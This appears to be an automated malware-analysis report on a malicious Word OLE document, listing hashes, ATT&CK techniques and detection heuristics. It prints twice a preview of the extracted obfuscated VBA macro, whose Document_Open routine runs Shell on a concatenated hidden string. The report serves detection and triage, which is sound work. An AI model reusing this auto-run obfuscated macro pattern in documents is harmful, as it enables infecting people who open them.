Office (OLE) malware analysis — malicious · fa2a0fe8f7e4f6ed

MALICIOUS

Office (OLE)

194.4 KB Created: 2018-07-20 12:54:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 369ea5bc897d52c706e5f8217ed58497 SHA-1: 8684e37ee4eba5ec49d4f7d313e535353fc50194 SHA-256: fa2a0fe8f7e4f6ed9962c7b3e06e08a9333f0efb5743aed663370bc666f27b6e

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro and a 'Shell()' call indicate that the document is designed to execute arbitrary code upon opening. The ClamAV detection 'Doc.Malware.Valyria-6700786-0' further confirms its malicious nature. The VBA script is heavily obfuscated, but the presence of the Shell() call strongly suggests it attempts to download and execute a secondary payload.

Heuristics 5

ClamAV: Doc.Malware.Valyria-6700786-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6700786-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40911 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	40911 bytes
SHA-256: `81531a64269e538a98d9a1ef71233f543ec85ce283caa51d976f443b93f9d328`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jlkGtOzLGhNnk" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function zzDGwktkGRT() On Error Resume Next MRLOh = 56446 / cGjod / 26455 - YIficv - VLLwFw - uNnhoP mVicT = 57415 / wEnhM / 86489 - IMXOoP - MEZhM - RoTZJ mWDtcZ = 12146 / fKAit / 35380 - zHkJq - zQcjO - tvGowm SYRkbK = 37688 / WOJEjG / 61890 - sjriCD - FjCdH - EapfW JfjTY = 29627 / jnFSFc / 25388 - aDFGmm - bMOsN - ZWBsP ziJfnT = 20852 / VtTSV / 43405 - LwllW - BMwUoN - Rafjk wXBPPY = 97043 / AsVQO / 61641 - ORQhHA - QFuGSn - lOXcO End Function Private Function IzPQiLLD() On Error Resume Next kjFvA = 70592 / dPnrJ / 10852 - wjFdz - KWsrJk - JBssz cfZCmO = 57879 / nVZIlE / 34789 - wwJBH - rNlPc - cWvrq RGDrkI = 55510 / WSBzEr / 53967 - tqRlOn - RWmYF - ahRZO fVZBIb = 53842 / XGvVIG / 21118 - Piwnz - LDJQSr - OFCcI End Function Private Function HYtifUvkQXOAa() On Error Resume Next wnWXHm = 51314 / GMYKA / 80736 - XqWPjA - sLiEO - ZTbXEr Tmvzq = 28740 / WuGjQ / 63773 - OTJwrf - LsCXrj - lAFIOf aPtlR = 42761 / XYwCn / 9416 - NIAvH - ttczf - ltAXB Zabdv = 73016 / wjXSw / 70940 - apqJDm - YHiSQ - GOJEqY End Function Private Function tnmrHHqTMRr() On Error Resume Next vTAlh = 95839 / rCuDfn / 48349 - UIwWPY - WqCnX - bwdojk vwszl = 41274 / bUzzl / 79792 - dWsjub - JiuaoP - RPwCZ SSCqU = 3828 / dEnqnm / 21273 - wMBan - HBhzAj - HubrB MEZiD = 13689 / WFpmwc / 36786 - wzqXI - NzXwFG - EwuLG clisO = 59039 / hRvjz / 6331 - DuYwiZ - NMPWXc - KdUmTO End Function Private Sub Document_open() On Error Resume Next QjJmWU = 79461 / hvuKBY / 95449 - aSknwJ - OPLwz - bZICoE FBObjA = 9641 / wpAkAO / 3631 - MHuInR - Mabik - dfHVBd Shell "" + YwWILOkwNE + EnzZiGcuWKVpIG + CVar("c") + INTljCtnRowp + zuNdWmIdF + mTUUczkwQLu + NDLUWjtuhVF + iozvR + sROKVw + hjOKczo + jjYjZhBliE + tNRNSAJhV + CnBwzn + LrqAvd + IAjjjdITwb + GaFAVDDW + vazPUQbKR + QfmwnqmF + kntzibzK + UtwVKpwov, 0 fRYoJ = 34581 / wOiUi / 93816 - DaGCSm - qGFSoz - itvukn rBcLKT = 459 / vLkMuG / 96702 - nrcpLT - VSKOU - ZuJHNj EVUIV = 19050 / OwkAOz / 44071 - PpmdP - OPPqj - zjFpF End Sub Private Function vzWXMjCdPi() On Error Resume Next JMJOzj = 39962 / viZaYl / 95995 - ooKorz - wBfiQ - ADwwVG tIZbJp = 39980 / UUvfr / 68097 - wJDhuI - qtcQw - NzYpp bJrzbY = 87784 / tPBqlO / 513 - wwMEKM - BDkva - bCiizM GGOjm = 51503 / NsrSi / 80990 - irpBww - IEwHz - jjuuoU Hjmps = 10165 / VcWIX / 44940 - djPiwn - wYwwPp - JPYkh rPZOS = 14692 / jaNmD / 11017 - ZuPTO - ptrdSC - MXLoB GCRjEV = 36308 / EMDsw / 73430 - QfnpH - RKUYFU - noNCoB bpDpwI = 65468 / cAkzU / 41831 - OhAnk - SjzsqI - WvGqJ End Function Private Function SQBJjEoH() On Error Resume Next jWscdG = 56404 / GOFBp / 28925 - IXpKw - maNfs - WiwdFw cmOSG = 16294 / qizokE / 57620 - EzWWb - pQOzu - AUivip YfEUq = 1362 / aTUXjl / 51232 - jimZs - wfzlSG - HkAEJJ Sdfip = 74188 / cPKMol / 62294 - VwNcMm - BKsYXp - aKsFqB TVUvNL = 13675 / IICvYS / 98343 - WnLcA - iYtDT - USablj SIoEQ = 77359 / ADwCR / 52886 - vYjwwi - jhaYY - oSEUw End Function Private Function OujnSTObjFi() On Error Resume Next zYaiEP = 53682 / TjzTZ / 49142 - nopwA - wHmLjT - wbVpS XQata = 56364 / OZDIP / 11772 - bEYicz - QoWXv - XsNIA EqcLFp = 39189 / FTHiND / 41381 - BLXGj - KarwKL - ovAWs nXOvX = 44805 / ihjDQ / 25707 - UXzHpc - GcDVf - zWMuHP oFTfRn = 74732 / zSMTj / 42138 - BJvqIz - FqiJBb - ftPsNj End Function Private Function cQqWKGEn() On Error Resume Next ZTBzG = 68354 / bSNcK / 20066 - oodiS - Cwadz - pPOqO GbCPd = 97336 / MRuTmA / 79156 - Ubnws - WdsXzE - wMbzor CnLWpk = 52808 / fwrZBa / 45497 - rGTudj - pRchj - tpbtNk mYAkVs = 72095 / HrwMU / 90349 - DSwlkw - sfuDQ - STzJl vIGsLB = 58060 / iHtzF / 60852 - VRaEh - sMjPL - oIQQiK End Function Attribute ... (truncated)

SHA-256: 81531a64269e538a98d9a1ef71233f543ec85ce283caa51d976f443b93f9d328

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jlkGtOzLGhNnk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function zzDGwktkGRT()
On Error Resume Next
   MRLOh = 56446 / cGjod / 26455 - YIficv - VLLwFw - uNnhoP
   mVicT = 57415 / wEnhM / 86489 - IMXOoP - MEZhM - RoTZJ
   mWDtcZ = 12146 / fKAit / 35380 - zHkJq - zQcjO - tvGowm
   SYRkbK = 37688 / WOJEjG / 61890 - sjriCD - FjCdH - EapfW
   JfjTY = 29627 / jnFSFc / 25388 - aDFGmm - bMOsN - ZWBsP
   ziJfnT = 20852 / VtTSV / 43405 - LwllW - BMwUoN - Rafjk
   wXBPPY = 97043 / AsVQO / 61641 - ORQhHA - QFuGSn - lOXcO
End Function
Private Function IzPQiLLD()
On Error Resume Next
   kjFvA = 70592 / dPnrJ / 10852 - wjFdz - KWsrJk - JBssz
   cfZCmO = 57879 / nVZIlE / 34789 - wwJBH - rNlPc - cWvrq
   RGDrkI = 55510 / WSBzEr / 53967 - tqRlOn - RWmYF - ahRZO
   fVZBIb = 53842 / XGvVIG / 21118 - Piwnz - LDJQSr - OFCcI
End Function
Private Function HYtifUvkQXOAa()
On Error Resume Next
   wnWXHm = 51314 / GMYKA / 80736 - XqWPjA - sLiEO - ZTbXEr
   Tmvzq = 28740 / WuGjQ / 63773 - OTJwrf - LsCXrj - lAFIOf
   aPtlR = 42761 / XYwCn / 9416 - NIAvH - ttczf - ltAXB
   Zabdv = 73016 / wjXSw / 70940 - apqJDm - YHiSQ - GOJEqY
End Function
Private Function tnmrHHqTMRr()
On Error Resume Next
   vTAlh = 95839 / rCuDfn / 48349 - UIwWPY - WqCnX - bwdojk
   vwszl = 41274 / bUzzl / 79792 - dWsjub - JiuaoP - RPwCZ
   SSCqU = 3828 / dEnqnm / 21273 - wMBan - HBhzAj - HubrB
   MEZiD = 13689 / WFpmwc / 36786 - wzqXI - NzXwFG - EwuLG
   clisO = 59039 / hRvjz / 6331 - DuYwiZ - NMPWXc - KdUmTO
End Function
Private Sub Document_open()
On Error Resume Next
   QjJmWU = 79461 / hvuKBY / 95449 - aSknwJ - OPLwz - bZICoE
   FBObjA = 9641 / wpAkAO / 3631 - MHuInR - Mabik - dfHVBd
Shell "" + YwWILOkwNE + EnzZiGcuWKVpIG + CVar("c") + INTljCtnRowp + zuNdWmIdF + mTUUczkwQLu + NDLUWjtuhVF + iozvR + sROKVw + hjOKczo + jjYjZhBliE + tNRNSAJhV + CnBwzn + LrqAvd + IAjjjdITwb + GaFAVDDW + vazPUQbKR + QfmwnqmF + kntzibzK + UtwVKpwov, 0
   fRYoJ = 34581 / wOiUi / 93816 - DaGCSm - qGFSoz - itvukn
   rBcLKT = 459 / vLkMuG / 96702 - nrcpLT - VSKOU - ZuJHNj
   EVUIV = 19050 / OwkAOz / 44071 - PpmdP - OPPqj - zjFpF
End Sub
Private Function vzWXMjCdPi()
On Error Resume Next
   JMJOzj = 39962 / viZaYl / 95995 - ooKorz - wBfiQ - ADwwVG
   tIZbJp = 39980 / UUvfr / 68097 - wJDhuI - qtcQw - NzYpp
   bJrzbY = 87784 / tPBqlO / 513 - wwMEKM - BDkva - bCiizM
   GGOjm = 51503 / NsrSi / 80990 - irpBww - IEwHz - jjuuoU
   Hjmps = 10165 / VcWIX / 44940 - djPiwn - wYwwPp - JPYkh
   rPZOS = 14692 / jaNmD / 11017 - ZuPTO - ptrdSC - MXLoB
   GCRjEV = 36308 / EMDsw / 73430 - QfnpH - RKUYFU - noNCoB
   bpDpwI = 65468 / cAkzU / 41831 - OhAnk - SjzsqI - WvGqJ
End Function
Private Function SQBJjEoH()
On Error Resume Next
   jWscdG = 56404 / GOFBp / 28925 - IXpKw - maNfs - WiwdFw
   cmOSG = 16294 / qizokE / 57620 - EzWWb - pQOzu - AUivip
   YfEUq = 1362 / aTUXjl / 51232 - jimZs - wfzlSG - HkAEJJ
   Sdfip = 74188 / cPKMol / 62294 - VwNcMm - BKsYXp - aKsFqB
   TVUvNL = 13675 / IICvYS / 98343 - WnLcA - iYtDT - USablj
   SIoEQ = 77359 / ADwCR / 52886 - vYjwwi - jhaYY - oSEUw
End Function
Private Function OujnSTObjFi()
On Error Resume Next
   zYaiEP = 53682 / TjzTZ / 49142 - nopwA - wHmLjT - wbVpS
   XQata = 56364 / OZDIP / 11772 - bEYicz - QoWXv - XsNIA
   EqcLFp = 39189 / FTHiND / 41381 - BLXGj - KarwKL - ovAWs
   nXOvX = 44805 / ihjDQ / 25707 - UXzHpc - GcDVf - zWMuHP
   oFTfRn = 74732 / zSMTj / 42138 - BJvqIz - FqiJBb - ftPsNj
End Function
Private Function cQqWKGEn()
On Error Resume Next
   ZTBzG = 68354 / bSNcK / 20066 - oodiS - Cwadz - pPOqO
   GbCPd = 97336 / MRuTmA / 79156 - Ubnws - WdsXzE - wMbzor
   CnLWpk = 52808 / fwrZBa / 45497 - rGTudj - pRchj - tpbtNk
   mYAkVs = 72095 / HrwMU / 90349 - DSwlkw - sfuDQ - STzJl
   vIGsLB = 58060 / iHtzF / 60852 - VRaEh - sMjPL - oIQQiK
End Function


Attribute 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.